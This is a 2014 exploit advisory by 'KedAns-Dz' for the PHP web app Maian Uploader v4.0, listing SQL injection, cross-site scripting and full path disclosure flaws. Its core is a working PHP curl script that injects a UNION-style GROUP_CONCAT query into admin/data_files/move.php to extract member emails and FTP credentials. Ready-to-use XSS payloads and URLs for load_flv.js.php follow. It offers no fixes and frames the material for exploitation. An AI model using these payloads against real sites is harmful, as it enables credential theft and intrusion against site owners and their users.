Maian Uploader 4.0 XSS / SQL Injection / Disclosure

`   
###########################################  
#-----------------------------------------#  
#[ 0-DAY Aint DIE | No Priv8 | KedAns-Dz ]#  
#-----------------------------------------#  
# *----------------------------* #  
# K |....##...##..####...####....| . #  
# h |....#...#........#..#...#...| A #  
# a |....#..#.........#..#....#..| N #  
# l |....###........##...#.....#.| S #  
# E |....#.#..........#..#....#..| e #  
# D |....#..#.........#..#...#...| u #  
# . |....##..##...####...####....| r #  
# *----------------------------* #  
#-----------------------------------------#  
#[ Copyright © 2014 | Dz Offenders Cr3w ]#  
#-----------------------------------------#  
###########################################  
# >> D_x . Made In Algeria . x_Z << #  
######################################################################  
#  
# [>] Title : Maian Uploader v4.0 <= (SQLi/Disclosure/XSS) Vulnerabilities  
#  
# [>] Author : KedAns-Dz  
# [+] E-mail : ked-h (@hotmail.com)  
# [+] FaCeb0ok : fb.me/K3d.Dz  
# [+] TwiTter : @kedans  
#  
# [#] Platform : PHP / WebApp  
# [+] Cat/Tag : SQL Injection , Cross-Site Scripting , Full Path Disclosure  
#  
# [<] <3 <3 Greetings t0 Palestine <3 <3  
# [>] ^_^ Greetings to 1337day Users/FAN's <3 *_* , i'm leaving 1337day  
# [-] F-ck Hacking , LuV Exploiting .. Penetration-Testing rouls  
#  
######################################################################  
#  
# [!] Description :  
#  
# Maian Uploader v4.0 is suffer from multiple vulnerabilities  
# remote attacker can exploit some bugs like SQL Injection , XSS  
# and disclosure the target full path.  
#  
# [!] CWE = CWE-89 , CWE-22 , CWE-352  
#  
####  
#   
# [+] Exploit (1) ' SQL Injection ' =>  
#  
# <?php  
#  
# /*  
#  
# - move.php (lines: 90 > 92 )  
# $q_acc = mysql_query("SELECT id,username FROM ".$database['prefix']."members   
# WHERE id != '".$_POST['id']."'   
# ORDER BY accname") or die(mysql_error());  
#  
# */  
#  
# $sqli = "SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,ftp_user,0x3a,ftp_pass SEPARATOR 0x2c20) FROM mu_members";  
#  
# $ch = curl_init();  
# curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);  
# curl_setopt($ch, CURLOPT_URL, "http://[target]/[path]/admin/data_files/move.php");  
# curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");  
# curl_setopt($ch, CURLOPT_POST, 1);  
# curl_setopt($ch, CURLOPT_POSTFIELDS, "id=$sqli");  
# $exploit = curl_exec ($ch);  
# curl_close($ch);  
# unset($ch);  
# echo $exploit;  
# ?>  
#   
####  
#  
# [+] Exploit (2) ' XSRF/XSS ' =>  
#  
# - load_flv.js.php ( line : 25 )   
# document.write('<object type="application/x-shockwave-flash" .....  
# width="<?php echo $_GET['width']; ?>"   
# height="<?php echo $_GET['height']; ?>  
#  
# XSS : "><h1>XsS by KedAns-Dz</h1>  
# XSS : "><script>Alert('XsS by KedAns-Dz');</script>  
#  
# http://127.0.0.1/uploader/admin/js/load_flv.js.php?width=[ XSS ]  
# http://127.0.0.1/uploader/js/load_flv.js.php?width=[ XSS ]  
#  
# [&] Exploit (3) ' Full Path Disclosure ' =>   
#  
# don't put ( &height= ) after width Xss and you get error   
# Notice about ( Undefined index: height ) with the Full Path Dir.  
#  
######################################################################  
  
####  
# <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !>  
# Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3  
#---------------------------------------------------------------  
# Greetings to my Homies : Indoushka , Caddy-Dz , Kalashinkov3 ,  
# Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic,  
# & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , &  
# & KnocKout , Angel Injection , The Black Divels , kaMtiEz , &  
# & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, &  
# & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day &   
# =( packetstormsecurity.org * metasploit.com * OWASP & OSVDB )=  
####  
`